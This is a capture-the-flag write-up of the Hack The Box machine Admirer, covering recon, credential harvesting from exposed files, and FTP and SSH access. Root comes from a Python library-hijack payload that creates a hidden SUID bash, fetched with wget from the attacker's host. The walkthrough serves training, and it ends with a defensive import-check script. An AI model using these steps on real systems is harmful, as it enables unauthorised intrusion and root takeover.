Admirer-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, FTP files, remote login to a locally hosted MySQL, privilege escalation via Python library hijacking

Reference: https://0xdf.gitlab.io/2020/09/26/htb-admirer.html

Reference: https://0xgeorge.github.io/2020/06/12/HTB-Admirer.html

0x01 Getting user access

1. Target IP address: 10.10.10.187

2. Enumerate the open ports:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p- --min-rate=10000 10.10.10.187
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-17 09:29 CST
Warning: 10.10.10.187 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.187
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.64 seconds

3. Fetch robots.txt

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/robots.txt
User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

4. Brute-force the files under /admin-dir

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,html -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.187/admin-dir
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,zip,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/contacts.txt (Status: 200) [Size: 350]


┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.187/admin-dir
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.187/_admin-dir_23-12-17_09-33-16.txt

Target: http://10.10.10.187/

[09:33:16] Starting: admin-dir/
[09:35:43] 200 - 135B - /admin-dir/credentials.txt

5. Read the two files that were found

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/admin-dir/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

6. Use the FTP credentials from that file to fetch the files on the FTP server

┌──(kali㉿kali)-[~/桌面]
└─$ wget --user ftpuser --password '%n?4Wz}R$tTF7' -m ftp://10.10.10.187
--2023-12-17 09:38:59-- ftp://10.10.10.187/
=> “10.10.10.187/.listing”
正在连接 10.10.10.187:21... 已连接。
正在以 ftpuser 登录 ... 登录成功!
==> SYST ... 完成。 ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。 ==> LIST ... 完成。

10.10.10.187/.listing [ <=> ] 254 --.-KB/s 用时 0s

2023-12-17 09:39:04 (12.6 MB/s) - “10.10.10.187/.listing” 已保存 [254]

--2023-12-17 09:39:04-- ftp://10.10.10.187/dump.sql
=> “10.10.10.187/dump.sql”
==> 不需要 CWD。
==> PASV ... 完成。 ==> RETR dump.sql ... 完成。
长度:3405 (3.3K)

10.10.10.187/dump.sql 100%[=========================>] 3.33K --.-KB/s 用时 0.001s

2023-12-17 09:39:06 (2.89 MB/s) - “10.10.10.187/dump.sql” 已保存 [3405]

--2023-12-17 09:39:06-- ftp://10.10.10.187/html.tar.gz
=> “10.10.10.187/html.tar.gz”
==> 不需要 CWD。
==> PASV ... 完成。 ==> RETR html.tar.gz ... 完成。
长度:5270987 (5.0M)

10.10.10.187/html.tar. 100%[=========================>] 5.03M 395KB/s 用时 38s

2023-12-17 09:39:45 (136 KB/s) - “10.10.10.187/html.tar.gz” 已保存 [5270987]

下载完毕 --2023-12-17 09:39:45--
总用时:45s
下载了:3 个文件,38s (136 KB/s) 中的 5.0M

┌──(kali㉿kali)-[~/桌面]
└─$ cd 10.10.10.187

┌──(kali㉿kali)-[~/桌面/10.10.10.187]
└─$ ls
dump.sql html.tar.gz

┌──(kali㉿kali)-[~/桌面/10.10.10.187]
└─$ tar ztf html.tar.gz --exclude "*/*"
assets/
images/
index.php
robots.txt
utility-scripts/
w4ld0s_s3cr3t_d1r/

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";

$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

7. Two database passwords have now been obtained, but the password cannot be obtained remotely; the only way forward is to set up MySQL locally and proceed through a remote connection.

First, I had to start the MySQL service on my local machine in order to exploit this vulnerability. This is done by running this command as root → service mysql start. Next, interact with the service by running mysql. Now that the service is started, the next steps are to create the database, user and table, and allow remote connections. I used the following commands to do this.

8. None of my attempts here quite worked, so I skipped this step for now; I will come back and study this technique once I have a better idea.

9. Back to the login passwords obtained above: the reason they could not log in to the local database is that the credentials on the live site differ from those in the FTP backup. The correct password should be:

$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

10. Log in and grab the first flag

┌──(kali㉿kali)-[~/桌面]
└─$ ssh waldo@10.10.10.187
The authenticity of host '10.10.10.187 (10.10.10.187)' can't be established.
ED25519 key fingerprint is SHA256:MfZJmYPldPPosZMdqhpjGPkT2fGNUn2vrEielbbFz/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.187' (ED25519) to the list of known hosts.
waldo@10.10.10.187's password:
Linux admirer 4.9.0-19-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Thu Aug 24 16:09:42 2023 from 10.10.14.23
waldo@admirer:~$
waldo@admirer:~$
waldo@admirer:~$ ls
user.txt
waldo@admirer:~$ cat user.txt
73f96891057715f28eb49be3d85e3a10
waldo@admirer:~$

0x02 Getting root

11. This step involves a fairly complicated exploitation setup, so I will just list the code that worked

#!/usr/bin/python3

import os

# Stand-in for shutil.make_archive so the backup script's call still resolves
def make_archive(a, b, c):
    pass

os.system('cp /bin/bash /var/tmp/.shiyan; chown root:root /var/tmp/.shiyan; chmod 4755 /var/tmp/.shiyan')

12. Run the exploit and get the final flag

waldo@admirer:/tmp$ cd /var/tmp
waldo@admirer:/var/tmp$ ls
waldo@admirer:/var/tmp$ wget 10.10.14.10:8000/shutil1.py -O shutil.py
--2023-12-17 02:23:12-- http://10.10.14.10:8000/shutil1.py
Connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 172 [text/x-python]
Saving to: ‘shutil.py’

shutil.py 100%[=========================>] 172 --.-KB/s in 0s

2023-12-17 02:23:13 (33.1 MB/s) - ‘shutil.py’ saved [172/172]

waldo@admirer:/var/tmp$ sudo PYTHONPATH=/var/tmp /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/var/tmp$ ls -la
total 1088
drwxrwxrwt 2 root root 4096 Dec 17 02:23 .
drwxr-xr-x 12 root root 4096 Nov 29 2019 ..
-rwsr-xr-x 1 root root 1099016 Dec 17 02:23 .shiyan
-rw-r--r-- 1 waldo waldo 172 Dec 17 02:18 shutil.py
waldo@admirer:/var/tmp$ ./.shiyan -p
.shiyan-4.4# id
uid=1000(waldo) gid=1000(waldo) euid=0(root) groups=1000(waldo),1001(admins)
.shiyan-4.4# cat /root/root.txt
98e7452da4c895df4dc888e95455dbfb
.shiyan-4.4#
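The escalation above depends on two things: sudo passing PYTHONPATH through to the root-run backup script, and Python trusting whatever that variable names ahead of its own standard library. As an added example from the defender's side (not code from the original post or from the box), the script below shows how a privileged Python script can confirm that a module such as shutil was loaded from the interpreter's stdlib directory, and how isolated mode (`python3 -I`) makes PYTHONPATH irrelevant; the function names and the constructed fake module are my own.

```python
#!/usr/bin/python3 -I
# Added defensive example: a privileged Python script can check that the stdlib
# modules it imports really come from the interpreter's stdlib directory and not
# from a directory injected through PYTHONPATH (the trick used against backup.py).
import importlib
import os
import sys
import sysconfig
import tempfile

def stdlib_roots():
    """Directories the interpreter itself treats as the standard library."""
    roots = {sysconfig.get_path("stdlib"), sysconfig.get_path("platstdlib")}
    return {os.path.realpath(r) for r in roots if r}

def module_origin(name):
    """Real path of the file `name` was loaded from; None for built-in modules."""
    path = getattr(importlib.import_module(name), "__file__", None)
    return os.path.realpath(path) if path else None

def is_from_stdlib(name):
    """True if `name` is built in or resolves to a file under the stdlib."""
    origin = module_origin(name)
    if origin is None:  # e.g. sys, compiled into the interpreter
        return True
    return any(origin.startswith(root + os.sep) for root in stdlib_roots())

def ignores_environment():
    """True when PYTHONPATH/PYTHONHOME are ignored (started with -I or -E)."""
    return bool(sys.flags.isolated or sys.flags.ignore_environment)

def demo_hijacked_import():
    """Constructed demo: a fake module placed ahead of the stdlib on sys.path,
    the same effect PYTHONPATH=/var/tmp had on the box. Returns the verdict."""
    tmp = tempfile.mkdtemp()
    fake = "fakemod_constructed_example"  # hypothetical module name
    with open(os.path.join(tmp, fake + ".py"), "w") as fh:
        fh.write("def make_archive(*a, **k):\n    return 'hijacked'\n")
    sys.path.insert(0, tmp)
    try:
        return is_from_stdlib(fake)  # False: it was loaded from the temp dir
    finally:
        sys.path.remove(tmp)
        sys.modules.pop(fake, None)

if __name__ == "__main__":
    print("shutil from stdlib:", is_from_stdlib("shutil"))
    print("fake module from stdlib:", demo_hijacked_import())
```

With the `-I` shebang the interpreter ignores PYTHONPATH entirely, so the origin check becomes a second line of defence rather than the only one.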

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/248


https://sh1yan.top/2023/12/17/Admirer-htb-writeup/
Author: shiyan
Published: December 17, 2023